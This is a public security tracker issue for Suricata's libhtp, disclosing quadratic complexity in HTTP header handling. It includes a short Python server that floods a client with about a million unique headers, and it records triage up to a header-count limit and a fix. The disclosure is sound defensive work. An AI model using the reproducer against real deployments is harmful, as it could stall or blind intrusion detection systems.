Project

General

Profile

Actions

Security #7191

closed

http: quadratic complexity in headers processing/finding

Added by Philippe Antoine 5 months ago. Updated 2 months ago.

Status:
Closed
Priority:
Normal
Target version:
Affected Versions:
Label:
Git IDs:
Severity:
CRITICAL
Disclosure Date:

Description

Found while creating CTF challenge against curl CVE-2023-38039

Script to create traffic was

import socket

HOST = "127.0.0.1"  # Standard loopback interface address (localhost)
PORT = 8001  # Port to listen on (non-privileged ports are > 1023)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    conn, addr = s.accept()
    with conn:
        print(f"Connected by {addr}")
        while True:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(b"HTTP/1.1 200 OK\n")
            for i in range(1024*1024):
                conn.sendall(b"Name%d: value%d\n" % (i, i))

Most time is spent in htp_process_response_header_generic. doing the htp_table_get


Files

curlinf.pcapng (24.1 MB) curlinf.pcapng Philippe Antoine, 07/31/2024 09:47 AM
curlinf2.pcapng (2.14 MB) curlinf2.pcapng Philippe Antoine, 07/31/2024 09:50 AM

Subtasks 1 (0 open1 closed)

Security #7192: http: quadratic complexity in headers processing/finding (7.0.x backport)ClosedPhilippe AntoineActions

Related issues 1 (0 open1 closed)

Related to Suricata - Task #7246: libhtp 0.5.49ClosedVictor JulienActions
Actions #1

Updated by OISF Ticketbot 5 months ago

  • Subtask #7192 added
Actions #2

Updated by OISF Ticketbot 5 months ago

  • Label deleted (Needs backport to 7.0)
Actions #3

Updated by Philippe Antoine 5 months ago

Smaller reproducer

This was not found by quadfuzz, because there needs to be a massive copy/paste but with each getting a small unique mutation...

Actions #4

Updated by OISF Ticketbot 5 months ago

  • Label deleted (Needs backport to 7.0)
Actions #5

Updated by Philippe Antoine 5 months ago

  • Status changed from New to Assigned

I guess the simple solution is to add a limit to the number of headers

Actions #6

Updated by Philippe Antoine 4 months ago

  • Status changed from Assigned to In Review

libhtp gitlab MR

Actions #7

Updated by Victor Julien 3 months ago

Actions #8

Updated by Victor Julien 3 months ago

  • Severity changed from MODERATE to CRITICAL

CRITICAL is it is a trivial action that the client can initiate.

Actions #12

Updated by Philippe Antoine 3 months ago

  • Status changed from Resolved to Closed
Actions #13

Updated by Victor Julien 2 months ago

  • Private changed from Yes to No
Actions

Also available in: Atom PDF